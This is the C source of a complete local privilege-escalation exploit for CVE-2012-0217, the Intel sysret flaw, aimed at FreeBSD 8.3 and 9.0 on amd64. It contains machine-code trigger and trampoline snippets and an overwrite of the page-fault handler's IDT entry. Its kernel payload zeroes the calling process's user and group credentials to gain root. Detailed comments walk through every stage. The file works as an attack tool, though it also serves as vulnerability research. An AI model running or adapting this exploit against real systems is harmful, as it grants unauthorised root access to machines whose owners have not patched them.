// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

// Addresses of the kernel's exception entry points. main() fills them in via
// get_symaddr(); kernelmodepayload() uses all of them when rewriting IDT
// entries, and trigger() uses Xpage_ptr to compute the trampoline address.
uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

// Return the base address of the interrupt descriptor table, as reported by
// the `sidt` instruction, typed as a pointer to gate descriptors so callers
// can index it by vector number.
struct gate_descriptor * sidt()
{
	struct region_descriptor idt;

	// sidt stores the IDT register contents into `idt`; only rd_base is used
	asm ("sidt %0": "=m"(idt));

	return (struct gate_descriptor*)idt.rd_base;
} 

u_long get_symaddr(char *symname)
{
	struct kld_sym_lookup ksym;

	ksym.version = sizeof (ksym);
	ksym.symname = symname;

	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
		perror("kldsym");
		exit(1);
	}
	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
	return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
//
// Fill in gate descriptor number `idx` of the table at `idt`.
//   idt  - base of the descriptor table
//   idx  - index of the entry to write
//   func - handler address; stored split across gd_looffset / gd_hioffset
//   typ  - value for gd_type
//   dpl  - value for gd_dpl
//   ist  - value for gd_ist
// The selector is always the kernel code segment (GCODE_SEL at SEL_KPL) and
// the entry is always marked present.
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
	struct gate_descriptor *ip;

	ip = idt + idx;
	// NOTE(review): gd_looffset presumably keeps only the low 16 bits of func
	// (bitfield width is defined in machine/segments.h) -- confirm
	ip->gd_looffset = func;
	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
	ip->gd_ist = ist;
	ip->gd_xx = 0;
	ip->gd_type = typ;
	ip->gd_dpl = dpl;
	ip->gd_p = 1;
	// remaining address bits, from bit 16 upwards
	ip->gd_hioffset = func>>16;
}

// User-mode continuation: kernelmodepayload() loads this function's address
// into rcx before executing sysretq. Prints a status line and terminates the
// process with status 0; it never returns.
void shellcode()
{
	// Actually we don't really need to spawn a shell since we
	// changed our whole cred struct.
	// Just exit...
	printf("[*] Got root!\n");
	exit(0);
}

// Code reached from the trampoline set up in trigger(). In order, it:
//   1. rewrites the IDT entries listed below with the handler addresses
//      held in the X*_ptr globals,
//   2. reads the current thread pointer from gs:0,
//   3. zeroes cr_uid, cr_ruid, cr_rgid and cr_groups[0] in the credential
//      structure of the thread's process,
//   4. executes swapgs + sysretq with rcx = shellcode.
// It does not return to its caller.
void kernelmodepayload()
{
	struct thread *td;
	struct ucred *cred;

	// We need to restore/recover whatever we smashed
	// We initialized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
	// idt[18], idt[17] and idt[16]
	// thus overall we have:
	// - idt[18], idt[17] and idt[16] are trashed
	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
	// - rdi -> overwrites the 64bit-LSB of idt[7]
	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
	struct gate_descriptor *idt = sidt();
	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

	// get the thread pointer
	asm ("mov %%gs:0, %0" : "=r"(td));

	// The Dark Knight Rises
	cred = td->td_proc->p_ucred;
	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
	cred->cr_groups[0] = 0;

	// return to user mode to spawn the shell
	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

// Byte counts of the two machine-code snippets built in trigger(), excluding
// the string literals' terminating NUL:
//   trigger code:    5 + 3 + 10 + 2 = 20
//   trampoline code: 3 + 3 + 10 + 2 = 18
#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

// Map the two code pages (trigger code at the top of the canonical user
// address range, trampoline at 0x9'<low 32 bits of Xpage_ptr>), patch the
// placeholder immediates in both snippets, then jump to the trigger code.
// Exits with status 1 if either mmap() fails.
void trigger()
{
	printf("[*] Setup...\n");
	// Allocate one page just before the non-canonical address
	printf("    [+] Trigger code...\n");
	uint64_t pagesize = getpagesize();
	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
	area = mmap(area, pagesize,
		PROT_READ | PROT_WRITE | PROT_EXEC,
		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
	if (area == MAP_FAILED) {
		perror("mmap (trigger)");
		exit(1);
	}

	// Copy the trigger code at the end of the page
	// such that the syscall instruction is at its
	// boundary
	char triggercode[] =
		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
		"\x0f\x05"; // syscall

	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

	// There are two outcomes given a target rsp:
	// - if rsp can't be written to, a double fault is triggered
	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
	//   and the exception frame is pushed to a special stack
	// - otherwise a #GP is triggered
	//   (Xprot defined in sys/amd64/amd64/exception.S)
	//   and the exception frame is pushed to [rsp]
	//
	// In the latter case, trouble is... #GP triggers a page fault
	// (Xpage):
	//  IDTVEC(prot)
	//  	subq	$TF_ERR,%rsp
	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
	//  [2]	movq	$0,TF_ADDR(%rsp)
	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
	//  	leaq	doreti_iret(%rip),%rdi
	//  	cmpq	%rdi,TF_RIP(%rsp)
	//  	je	1f			/* kernel but with user gsbase!! */
	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
	//  	jz	2f			/* already running with kernel GS.base */
	//  1:	swapgs
	//  2:	movq	PCPU(CURPCB),%rdi [5]
	//
	// [4] sets the Z flag because we come from the kernel (while executing sysret)
	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
	// it was restored just before calling sysret...
	// Thus, [5] triggers a page fault while trying to access gs:data
	// If we don't do anything we'll eventually double fault, triple fault etc. and crash
	//
	// We therefore need a way: (1) to recover from the GP, (2) to clean
	// any mess we did. Both could be solved if we can get an arbitrary
	// code execution by the time we reach [5] (NB: this is not mandatory, we could
	// get the code execution later down the fault trigger chain)
	//
	// So... here is the idea: wouldn't it be nice if we could overwrite the
	// page fault handler's address and therefore get code execution when [5]
	// triggers the #PF?
	//
	// For reference:
	// Gate descriptor:
	// +0: Target Offset[15:0] | Target Selector
	// +4: Some stuff | Target Offset[31:16]
	// +8: Target Offset[63:32]
	// +12: Stuff
	//
	// and from include/frame.h:
	//  struct trapframe {
	//  	register_t	tf_rdi;
	//  	register_t	tf_rsi;
	//  	register_t	tf_rdx;
	//  	register_t	tf_rcx;
	//  	register_t	tf_r8;
	//  	register_t	tf_r9;
	//  	register_t	tf_rax;
	//  	register_t	tf_rbx;
	//  	register_t	tf_rbp;
	//  	register_t	tf_r10;
	//  	register_t	tf_r11;
	//  	register_t	tf_r12;
	//  	register_t	tf_r13;
	//  	register_t	tf_r14;
	//  	register_t	tf_r15;
	//  	uint32_t	tf_trapno;
	//  	uint16_t	tf_fs;
	//  	uint16_t	tf_gs;
	//  	register_t	tf_addr;
	//  	uint32_t	tf_flags;
	//  	uint16_t	tf_es;
	//  	uint16_t	tf_ds;
	//  	/* below portion defined in hardware */
	//  	register_t	tf_err;
	//  	register_t	tf_rip;
	//  	register_t	tf_cs;
	//  	register_t	tf_rflags;
	//  	register_t	tf_rsp;
	//  	register_t	tf_ss;
	//  };
	//
	// When the exception is triggered, the hardware pushes
	// ss, rsp, rflags, cs, rip and err
	//
	// We can see that [1], [2] and [3] write to the stack
	// [3] is fully user-controlled through rdi, so we could try to align
	// rsp such that [3] overwrites the offset address
	//
	// The trouble is... rsp is 16byte aligned for exceptions. We can
	// therefore only overwrite the low 32 bits of the offset address
	// (check how rdi is 16byte aligned in this trapframe)
	//
	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
	// and tf_trapno is 16byte aligned + 8!
	// This enables us to set Target Offset[63:32] to 0x9
	//
	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
	// (offset 10 is where the 64-bit immediate of "mov rsp, imm64" starts
	// in triggercode: 5 + 3 bytes of preceding code + 2 opcode bytes)
	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
	// some setup and jump to our kernel mode code
	printf("    [+] Trampoline code...\n");
	char trampolinecode[] =
		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
		"\xff\xe0"; // jmp rax

	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
	size_t trampoline_allocsize = pagesize;
	// We round the address to the PAGESIZE for the allocation
	// Not enough space for the trampoline code ?
	// (i.e. the code would run past the end of its first page, so map two)
	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
		trampoline_allocsize += pagesize;
	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
		PROT_READ | PROT_WRITE | PROT_EXEC,
		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
	{
		perror("mmap (trampoline)");
		exit(1);
	}
	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
	// offset 8 is where the 64-bit immediate of "mov rax, imm64" starts
	// in trampolinecode: 3 + 3 bytes of preceding code + 2 opcode bytes
	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
	// Call it
	printf("[*] Fire in the hole!\n");
	((void (*)())trigger_addr)();
}

// One (OS name, release, architecture) combination, in the same form as the
// sysname / release / machine strings that main() takes from uname().
typedef struct validtarget
{
	char *sysname;
	char *release;
	char *machine;
} validtarget_t;

// Return 1 when (sysname, release, machine) exactly matches one of the
// built-in table entries, 0 otherwise. All three strings are compared with
// strcmp(), so the match is case-sensitive and must be complete.
int validate_target(char * sysname, char * release, char * machine)
{
	validtarget_t known[] = {
		{ "FreeBSD", "8.3-RELEASE", "amd64" },
		{ "FreeBSD", "9.0-RELEASE", "amd64" },
	};
	size_t count = sizeof known / sizeof known[0];
	size_t k;

	for (k = 0; k < count; ++k) {
		if (strcmp(known[k].sysname, sysname) != 0)
			continue;
		if (strcmp(known[k].release, release) != 0)
			continue;
		if (strcmp(known[k].machine, machine) != 0)
			continue;
		return 1;
	}
	return 0;
}

// Write the 12-character CPUID vendor identification string, followed by a
// terminating NUL, into `cpu_vendor`.
//   cpu_vendor - caller-provided buffer of at least 13 bytes
// The string is assembled from the leaf-0 result registers in the order
// regs[1], regs[3], regs[2] (EBX, EDX, ECX).
void get_cpu_vendor(char * cpu_vendor)
{
	u_int regs[4];

	do_cpuid(0, regs);
	// Copy bytewise instead of storing through a casted u_int pointer: the
	// destination is a char buffer with no alignment guarantee, and writing
	// it through an incompatible pointer type is undefined behaviour.
	memcpy(cpu_vendor, &regs[1], sizeof regs[1]);
	memcpy(cpu_vendor + sizeof regs[1], &regs[3], sizeof regs[3]);
	memcpy(cpu_vendor + sizeof regs[1] + sizeof regs[3], &regs[2], sizeof regs[2]);
	cpu_vendor[12] = '\0';
}

// Return 1 when the CPU vendor string obtained from get_cpu_vendor() is
// exactly "GenuineIntel", 0 otherwise.
int is_intel()
{
	char vendor[13];

	get_cpu_vendor(vendor);
	if (strcmp(vendor, "GenuineIntel") == 0)
		return 1;
	return 0;
}

// Program entry point. Prints the CPU vendor and uname() fields, stops with
// exit status 1 unless is_intel() and validate_target() both accept the
// host, resolves the nine handler symbols into the X*_ptr globals, then
// calls trigger(). argc and argv are not used.
int main(int argc, char *argv[])
{
	// Symbols to resolve, each paired with the global that receives its
	// address. They are looked up (and therefore printed) in this order.
	struct {
		char *name;
		uintptr_t *slot;
	} wanted[] = {
		{ "Xofl", &Xofl_ptr },
		{ "Xbnd", &Xbnd_ptr },
		{ "Xill", &Xill_ptr },
		{ "Xdna", &Xdna_ptr },
		{ "Xpage", &Xpage_ptr },
		{ "Xfpu", &Xfpu_ptr },
		{ "Xalign", &Xalign_ptr },
		{ "Xmchk", &Xmchk_ptr },
		{ "Xxmm", &Xxmm_ptr },
	};
	size_t nwanted = sizeof wanted / sizeof wanted[0];
	size_t s;
	char vendor[13];
	struct utsname host;

	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

	printf("[*] Retrieving host information...\n");
	get_cpu_vendor(vendor);
	uname(&host);
	printf("    [+] CPU: %s\n", vendor);
	printf("    [+] sysname: %s\n", host.sysname);
	printf("    [+] release: %s\n", host.release);
	printf("    [+] version: %s\n", host.version);
	printf("    [+] machine: %s\n", host.machine);

	printf("[*] Validating target OS and version...\n");
	// validate_target() is only consulted when the vendor check passes
	if (!(is_intel() && validate_target(host.sysname, host.release, host.machine))) {
		printf("    [+] NOT Vulnerable :-(\n");
		exit(1);
	}
	printf("    [+] Vulnerable :-)\n");

	// Prepare the values we'll need to restore the kernel to a stable state
	printf("[*] Resolving kernel addresses...\n");
	for (s = 0; s < nwanted; ++s)
		*wanted[s].slot = (uintptr_t)get_symaddr(wanted[s].name);

	// doeet!
	trigger();
	return 0;
}

